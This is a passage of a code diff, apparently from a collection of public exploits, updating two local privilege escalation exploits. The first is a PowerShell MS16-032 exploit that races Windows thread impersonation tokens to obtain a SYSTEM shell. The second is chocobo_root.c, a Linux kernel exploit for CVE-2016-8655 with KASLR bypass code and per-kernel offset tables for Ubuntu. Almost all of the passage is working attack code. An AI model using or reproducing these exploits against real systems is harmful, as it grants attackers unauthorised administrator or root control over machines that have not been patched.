-        public static extern bool CloseHandle(IntPtr hObject);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool DuplicateHandle(
-            IntPtr hSourceProcessHandle,
-            IntPtr hSourceHandle,
-            IntPtr hTargetProcessHandle,
-            ref IntPtr lpTargetHandle,
-            int dwDesiredAccess,
-            bool bInheritHandle,
-            int dwOptions);
-    }
-
-    public static class Ntdll
-    {
-        [DllImport("ntdll.dll", SetLastError=true)]
-        public static extern int NtImpersonateThread(
-            IntPtr ThreadHandle,
-            IntPtr ThreadToImpersonate,
-            ref SQOS SecurityQualityOfService);
-    }
+.DESCRIPTION
+	Author: Ruben Boonen (@FuzzySec)
+	Blog: http://www.fuzzysecurity.com/
+	License: BSD 3-Clause
+	Required Dependencies: PowerShell v2+
+	Optional Dependencies: None
+    
+.EXAMPLE
+	C:\PS> Invoke-MS16-032
+#>
+	Add-Type -TypeDefinition @"
+	using System;
+	using System.Diagnostics;
+	using System.Runtime.InteropServices;
+	using System.Security.Principal;
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public int dwProcessId;
+		public int dwThreadId;
+	}
+	
+	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+	public struct STARTUPINFO
+	{
+		public Int32 cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public Int32 dwX;
+		public Int32 dwY;
+		public Int32 dwXSize;
+		public Int32 dwYSize;
+		public Int32 dwXCountChars;
+		public Int32 dwYCountChars;
+		public Int32 dwFillAttribute;
+		public Int32 dwFlags;
+		public Int16 wShowWindow;
+		public Int16 cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct SQOS
+	{
+		public int Length;
+		public int ImpersonationLevel;
+		public int ContextTrackingMode;
+		public bool EffectiveOnly;
+	}
+	
+	public static class Advapi32
+	{
+		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+		public static extern bool CreateProcessWithLogonW(
+			String userName,
+			String domain,
+			String password,
+			int logonFlags,
+			String applicationName,
+			String commandLine,
+			int creationFlags,
+			int environment,
+			String currentDirectory,
+			ref  STARTUPINFO startupInfo,
+			out PROCESS_INFORMATION processInformation);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool SetThreadToken(
+			ref IntPtr Thread,
+			IntPtr Token);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenThreadToken(
+			IntPtr ThreadHandle,
+			int DesiredAccess,
+			bool OpenAsSelf,
+			out IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenProcessToken(
+			IntPtr ProcessHandle, 
+			int DesiredAccess,
+			ref IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public extern static bool DuplicateToken(
+			IntPtr ExistingTokenHandle,
+			int SECURITY_IMPERSONATION_LEVEL,
+			ref IntPtr DuplicateTokenHandle);
+	}
+	
+	public static class Kernel32
+	{
+		[DllImport("kernel32.dll")]
+		public static extern uint GetLastError();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentProcess();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentThread();
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern int GetThreadId(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError = true)]
+		public static extern int GetProcessIdOfThread(IntPtr handle);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int SuspendThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int ResumeThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool TerminateProcess(
+			IntPtr hProcess,
+			uint uExitCode);
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool CloseHandle(IntPtr hObject);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool DuplicateHandle(
+			IntPtr hSourceProcessHandle,
+			IntPtr hSourceHandle,
+			IntPtr hTargetProcessHandle,
+			ref IntPtr lpTargetHandle,
+			int dwDesiredAccess,
+			bool bInheritHandle,
+			int dwOptions);
+	}
+	
+	public static class Ntdll
+	{
+		[DllImport("ntdll.dll", SetLastError=true)]
+		public static extern int NtImpersonateThread(
+			IntPtr ThreadHandle,
+			IntPtr ThreadToImpersonate,
+			ref SQOS SecurityQualityOfService);
+	}
 "@
+	
+	function Get-ThreadHandle {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -ErrorAction SilentlyContinue -Verbose).FullName

-    function Get-ThreadHandle {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
-        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)

-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
+		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+		$lpTargetHandle = [IntPtr]::Zero
+		$CallResult = [Kernel32]::DuplicateHandle(
+			$ProcessInfo.hProcess, 0x4,
+			[Kernel32]::GetCurrentProcess(),
+			[ref]$lpTargetHandle, 0, $false,
+			0x00000002)
+		
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		
+		$lpTargetHandle
+	}
+	
+	function Get-SystemToken {
+		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
+	
+		$CallResult = [Kernel32]::SuspendThread($hThread)
+		if ($CallResult -ne 0) {
+			echo "[!] $hThread is a bad thread, exiting.."
+			Return
+		} echo "[+] Thread suspended"
+		
+		echo "[>] Wiping current impersonation token"
+		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
+		if (!$CallResult) {
+			echo "[!] SetThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[>] Building SYSTEM impersonation token"
+		# SecurityQualityOfService struct
+		$SQOS = New-Object SQOS
+		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+		# Undocumented API's, I like your style Microsoft ;)
+		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
+		if ($CallResult -ne 0) {
+			echo "[!] NtImpersonateThread failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		# Null $SysTokenHandle
+		$script:SysTokenHandle = [IntPtr]::Zero

-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
+		if (!$CallResult) {
+			echo "[!] OpenThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+		echo "[+] Resuming thread.."
+		$CallResult = [Kernel32]::ResumeThread($hThread)
+	}
+	
+	# main() <--- ;)
+	$ms16032 = @"
+	 __ __ ___ ___   ___     ___ ___ ___ 
+	|  V  |  _|_  | |  _|___|   |_  |_  |
+	|     |_  |_| |_| . |___| | |_  |  _|
+	|_|_|_|___|_____|___|   |___|___|___|
+	                                    
+	               [by b33f -> @FuzzySec]
+"@
+	
+	$ms16032
+	
+	# Check logical processor count, race condition requires 2+
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handle"
+	$hThread = Get-ThreadHandle
+	
+	# If no thread handle is captured, the box is patched
+	if ($hThread -eq 0) {
+		echo "[!] No valid thread handle was captured, exiting!`n"
+		Return
+	} else {
+		echo "[?] Done, using thread handle: $hThread"
+	} echo "`n[*] Sniffing out privileged impersonation token.."
+	
+	# Get handle to SYSTEM access token
+	Get-SystemToken
+	
+	# If we fail a check in Get-SystemToken, exit
+	if ($SysTokenHandle -eq 0) {
+		Return
+	}
+	
+	echo "`n[*] Sniffing out SYSTEM shell.."
+	echo "`n[>] Duplicating SYSTEM token"
+	$hDuplicateTokenHandle = [IntPtr]::Zero
+	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+	
+	# Simple PS runspace definition
+	echo "[>] Starting token race"
+	$Runspace = [runspacefactory]::CreateRunspace()
+	$StartTokenRace = [powershell]::Create()
+	$StartTokenRace.runspace = $Runspace
+	$Runspace.Open()
+	[void]$StartTokenRace.AddScript({
+		Param ($hThread, $hDuplicateTokenHandle)
+		while ($true) {
+			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
+		}
+	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
+	$AscObj = $StartTokenRace.BeginInvoke()
+	
+	echo "[>] Starting process race"
+	# Adding a timeout (10 seconds) here to safeguard from edge-cases
+	$SafeGuard = [diagnostics.stopwatch]::StartNew()
+	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $path1, "",
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, $cmd, $args1,
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+		
+		#---
+		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+		#---
+		# Missing this check used to cause the exploit to fail sometimes.
+		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
+		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
+		# reliable now!
+		#---
+		if (!$CallResult) {
+			continue
+		}
+			
+		$hTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+		# If we can't open the process token it's a SYSTEM shell!
+		if (!$CallResult) {
+			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+			$StartTokenRace.Stop()
+			$SafeGuard.Stop()
+			echo "$end"
+			Return
+		}
+			
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

-        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
-        $lpTargetHandle = [IntPtr]::Zero
-        $CallResult = [Kernel32]::DuplicateHandle(
-            $ProcessInfo.hProcess, 0x4,
-            [Kernel32]::GetCurrentProcess(),
-            [ref]$lpTargetHandle, 0, $false,
-            0x00000002)
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-
-        $lpTargetHandle
-    }
-
-    function Get-SystemToken {
-        echo "`n[?] Trying thread handle: $Thread"
-        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
-
-        $CallResult = [Kernel32]::SuspendThread($Thread)
-        if ($CallResult -ne 0) {
-            echo "[!] $Thread is a bad thread, moving on.."
-            Return
-        } echo "[+] Thread suspended"
-
-        echo "[>] Wiping current impersonation token"
-        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
-        if (!$CallResult) {
-            echo "[!] SetThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[>] Building SYSTEM impersonation token"
-        # SecurityQualityOfService struct
-        $SQOS = New-Object SQOS
-        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
-        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
-        # Undocumented API's, I like your style Microsoft ;)
-        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
-        if ($CallResult -ne 0) {
-            echo "[!] NtImpersonateThread failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        $script:SysTokenHandle = [IntPtr]::Zero
-        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
-        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
-        if (!$CallResult) {
-            echo "[!] OpenThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
-        echo "[+] Resuming thread.."
-        $CallResult = [Kernel32]::ResumeThread($Thread)
-    }
-
-    # main() <--- ;)
-
-    # Check logical processor count, race condition requires 2+
-    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
-    if ($([System.Environment]::ProcessorCount) -lt 2) {
-        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
-        Return
-    }
-
-    # Create array for Threads & TID's
-    $ThreadArray = @()
-    $TidArray = @()
-
-    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
-        $hThread = Get-ThreadHandle
-        $hThreadID = [Kernel32]::GetThreadId($hThread)
-        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
-        if ($TidArray -notcontains $hThreadID) {
-            $TidArray += $hThreadID
-            if ($hThread -ne 0) {
-                $ThreadArray += $hThread # This is what we need!
-            }
-        }
-    }
-
-    if ($($ThreadArray.length) -eq 0) {
-        echo "[!] No valid thread handles were captured, exiting!"
-        Return
-    } else {
-        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
-        echo "`n[?] Thread handle list:"
-        $ThreadArray
-    }
-
-    echo "`n[*] Sniffing out privileged impersonation token.."
-    foreach ($Thread in $ThreadArray){
-
-        # Get handle to SYSTEM access token
-        Get-SystemToken
-
-        echo "`n[*] Sniffing out SYSTEM shell.."
-        echo "`n[>] Duplicating SYSTEM token"
-        $hDuplicateTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
-
-        # Simple PS runspace definition
-        echo "[>] Starting token race"
-        $Runspace = [runspacefactory]::CreateRunspace()
-        $StartTokenRace = [powershell]::Create()
-        $StartTokenRace.runspace = $Runspace
-        $Runspace.Open()
-        [void]$StartTokenRace.AddScript({
-            Param ($Thread, $hDuplicateTokenHandle)
-            while ($true) {
-                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
-            }
-        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
-        $AscObj = $StartTokenRace.BeginInvoke()
-
-        echo "[>] Starting process race"
-        # Adding a timeout (10 seconds) here to safeguard from edge-cases
-        $SafeGuard = [diagnostics.stopwatch]::StartNew()
-        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
-
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
-
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $cmd, $args1,
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
-        $hTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
-
-        # If we can't open the process token it's a SYSTEM shell!
-        if (!$CallResult) {
-            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
-            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
-            $StartTokenRace.Stop()
-            $SafeGuard.Stop()
-            Return
-        }
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-        }
-
-        # Kill runspace & stopwatch if edge-case
-        $StartTokenRace.Stop()
-        $SafeGuard.Stop()
-    }
-    exit
+	}
+	
+	# Kill runspace & stopwatch if edge-case
+	$StartTokenRace.Stop()
+	$SafeGuard.Stop()
+#}
@@ -1,7 +1,7 @@
 /*
 chocobo_root.c
 linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP/SMAP bypasses.
+Includes KASLR and SMEP bypasses. No SMAP bypass.
 For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
 All kernel offsets have been tested on Ubuntu / Linux Mint.

@@ -11,7 +11,7 @@ user@ubuntu:~$ uname -a
 Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 user@ubuntu:~$ id
 uid=1000(user) gid=1000(user) groups=1000(user)
-user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread -Wall
 user@ubuntu:~$ ./chocobo_root
 linux AF_PACKET race condition exploit by rebel
 kernel version: 4.4.0-51-generic #72
@@ -75,7 +75,7 @@ Updated by <bcoles@gmail.com>
 - check number of CPU cores
 - KASLR bypasses
 - additional kernel targets
-https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
+https://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655
 */

 #define _GNU_SOURCE
@@ -85,13 +85,13 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <pthread.h>
 #include <sched.h>
 #include <signal.h>
-#include <stdbool.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
-
+#include <linux/if_packet.h>
+#include <netinet/in.h>
 #include <sys/klog.h>
 #include <sys/mman.h>
 #include <sys/types.h>
@@ -102,12 +102,6 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <sys/utsname.h>
 #include <sys/wait.h>

-#include <arpa/inet.h>
-#include <linux/if_packet.h>
-#include <linux/sched.h>
-#include <netinet/tcp.h>
-#include <netinet/if_ether.h>
-
 #define DEBUG

 #ifdef DEBUG
@@ -116,9 +110,18 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #  define dprintf
 #endif

-#define ENABLE_KASLR_BYPASS 1
+#define ENABLE_SYSTEM_CHECKS		1
+#define ENABLE_KASLR_BYPASS		1

-// Will be overwritten if ENABLE_KASLR_BYPASS
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS	1
+#  define ENABLE_KASLR_BYPASS_SYSLOG	1
+#  define ENABLE_KASLR_BYPASS_MINCORE	1
+#endif
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
 unsigned long KERNEL_BASE = 0xffffffff81000000ul;

 // Will be overwritten by detect_versions()
@@ -131,6 +134,7 @@ const char *SYSCTL_PATH = "/proc/sys/hack";
 volatile int barrier = 1;
 volatile int vers_switcher_done = 0;

+// kernel target struct
 struct kernel_info {
    char *kernel_version;
    unsigned long proc_dostring;
@@ -139,6 +143,7 @@ struct kernel_info {
    unsigned long set_memory_rw;
 };

+// Targets
 struct kernel_info kernels[] = {
    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
@@ -170,6 +175,16 @@ struct kernel_info kernels[] = {
    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+
+    { "4.4.0-21-lowlatency #37-Ubuntu",  0x88960, 0xe48e80, 0x28c3a0, 0x6fae0 },
+    { "4.4.0-22-lowlatency #40-Ubuntu",  0x889c0, 0xe48f00, 0x28c570, 0x6fae0 },
+    { "4.4.0-24-lowlatency #43-Ubuntu",  0x88ae0, 0xe48f00, 0x28c9a0, 0x6fae0 },
+    { "4.4.0-28-lowlatency #47-Ubuntu",  0x88b20, 0xe48f80, 0x28ce20, 0x6fae0 },
+    { "4.4.0-31-lowlatency #50-Ubuntu",  0x88b20, 0xe48f80, 0x28cf10, 0x6fae0 },
+    { "4.4.0-34-lowlatency #53-Ubuntu",  0x88b20, 0xe48f80, 0x28cf50, 0x6fae0 },
+    { "4.4.0-36-lowlatency #55-Ubuntu",  0x88b00, 0xe48f80, 0x28cf30, 0x6fad0 },
+    { "4.4.0-38-lowlatency #57-Ubuntu",  0x88bd0, 0xe48f80, 0x28d580, 0x6fad0 },
+    { "4.4.0-42-lowlatency #62-Ubuntu",  0x88c30, 0xe48f80, 0x28d5b0, 0x6faa0 },
 };

 #define VSYSCALL              0xffffffffff600000
@@ -202,6 +217,7 @@ struct tpacket_req3 tp;
 int sfd;
 int mapped = 0;

+// timer_list struct defined in: include/linux/timer.h
 struct timer_list {
    void *next;
    void *prev;
@@ -255,6 +271,10 @@ void *vers_switcher(void *arg)
 #define BUFSIZE 1408
 char exploitbuf[BUFSIZE];

+#ifndef ETH_P_ARP
+#    define ETH_P_ARP 0x0806
+#endif
+
 void kmalloc(void)
 {
    while(1)
@@ -266,7 +286,7 @@ void pad_kmalloc(void)
    int x;
    for (x = 0; x < KMALLOC_PAD; x++)
        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
-            dprintf("[-] pad_kmalloc() socket error\n");
+            dprintf("[-] pad_kmalloc() socket error: %m\n");
            exit(EXIT_FAILURE);
        }
 }
@@ -289,7 +309,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    sigaddset(&set, SIGSEGV);

    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
        exit(1);
    }

@@ -300,7 +320,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));

    if (fd == -1) {
-        dprintf("[-] target socket error\n");
+        dprintf("[-] target socket error: %m\n");
        exit(1);
    }

@@ -324,7 +344,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    sfd = fd;

    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
-        dprintf("[-] Error creating thread\n");
+        dprintf("[-] Error creating thread: %m\n");
        return 1;
    }

@@ -360,7 +380,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);

    if (pbd == MAP_FAILED) {
-        dprintf("[-] could not map pbd\n");
+        dprintf("[-] could not map pbd: %m\n");
        exit(1);
    } else {
        off = pbd->hdr.bh1.offset_to_first_pkt;
@@ -415,13 +435,13 @@ void *modify_vsyscall(void *arg)
    sigaddset(&set, SIGSEGV);

    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
        exit(EXIT_FAILURE);
    }

    signal(SIGSEGV, catch_sigsegv);

-    *vsyscall = 0xdeadbeef+x;
+    *vsyscall = 0xdeadbeef + x;

    if (*vsyscall == 0xdeadbeef+x) {
        dprintf("[~] vsyscall page altered!\n");
@@ -449,7 +469,7 @@ void verify_stage1(void)
            exit(0);
        }

-        write(2,".",1);
+        write(2, ".", 1);
        sleep(1);
    }

@@ -471,7 +491,7 @@ void verify_stage2(void)
            exit(0);
        }

-        write(2,".",1);
+        write(2, ".", 1);
        sleep(1);
    }

@@ -548,7 +568,29 @@ void wrapper(void)

 // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *

-void check_procs() {
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+    int f = open(file, O_RDONLY);
+    if (f == -1)
+        return -1;
+    int bytes_read = 0;
+    while (1) {
+        int bytes_to_read = CHUNK_SIZE;
+        if (bytes_to_read > max_length - bytes_read)
+            bytes_to_read = max_length - bytes_read;
+        int rv = read(f, &buffer[bytes_read], bytes_to_read);
+        if (rv == -1)
+            return -1;
+        bytes_read += rv;
+        if (rv == 0)
+            return bytes_read;
+    }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+void check_env() {
    int min_procs = 2;

    int nprocs = 0;
@@ -559,7 +601,24 @@ void check_procs() {
        exit(EXIT_FAILURE);
    }

-    dprintf("[.] system has %d processor cores\n", nprocs);
+    char buffer[PROC_CPUINFO_LENGTH];
+    char* path = "/proc/cpuinfo";
+    int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+    if (length == -1) {
+        dprintf("[-] open/read(%s): %m\n", path);
+        exit(EXIT_FAILURE);
+    }
+
+    char* found = memmem(&buffer[0], length, "smap", 4);
+    if (found != NULL) {
+        dprintf("[-] SMAP detected, no bypass available\n");
+        exit(EXIT_FAILURE);
+    }
+
+    struct stat st;
+    if (stat("/dev/grsec", &st) == 0) {
+        dprintf("[!] Warning: grsec is in use\n");
+    }
 }

 struct utsname get_kernel_version() {
@@ -573,10 +632,11 @@ struct utsname get_kernel_version() {
 }

 #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512

 void detect_versions() {
    struct utsname u;
-    char kernel_version[512];
